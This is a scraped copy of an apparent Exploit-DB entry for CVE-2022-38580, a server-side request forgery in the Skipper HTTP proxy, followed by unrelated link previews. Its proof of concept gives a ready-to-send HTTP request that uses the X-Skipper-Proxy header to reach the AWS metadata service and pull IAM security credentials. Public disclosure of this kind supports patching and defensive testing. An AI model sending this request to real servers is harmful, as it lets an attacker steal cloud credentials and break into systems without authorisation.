[remote] X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)

2 years ago

source link: https://www.exploit-db.com/exploits/51111
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)

EDB-ID:

51111

Platform:

Date:

2023-03-28

Vulnerable App:

#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580


Summary:

Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.


Proof Of Concept:

1- Add header "X-Skipper-Proxy"  to your request
2- Add the aws metadata to the path

GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close




Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

Copy

Recommend

spring.io 7 years ago
Cache

Spring Cloud Skipper 1.0 M2 Released

<p>On behalf of the team, I am pleased to announce the release of Spring Cloud Skipper 1.0 M2.</p><p>Skipper is a lightweight tool that allows you to discover Spring Boot applications and manage their lifecycle on multiple Clou...

Github github.com 7 years ago
Cache

GitHub - zalando/skipper: An HTTP router and reverse proxy for service compositi...

GitHub is where people build software. More than 28 million people use GitHub to discover, fork, and contribute to over 79 million projects.

blog.sqreen.com 4 years ago
Cache

Server-side request forgery (SSRF), explained

Server-side request forgery (SSRF), explained Web applications have become one of the most important assets for companies of all sizes. And due to this, they have also become a target. Web applications are getting more co...

gist.github.com 2 years ago
Cache

YouTube Ad Skipper Bookmarklet

Once "installed", this bookmarklet can be used to immediately skip any YouTube ads with a 5-second countdown. Once enabled in a tab, it will continue to run in that tab until the page is reloaded or the tab is closed. Brave/Chrome/Chromium...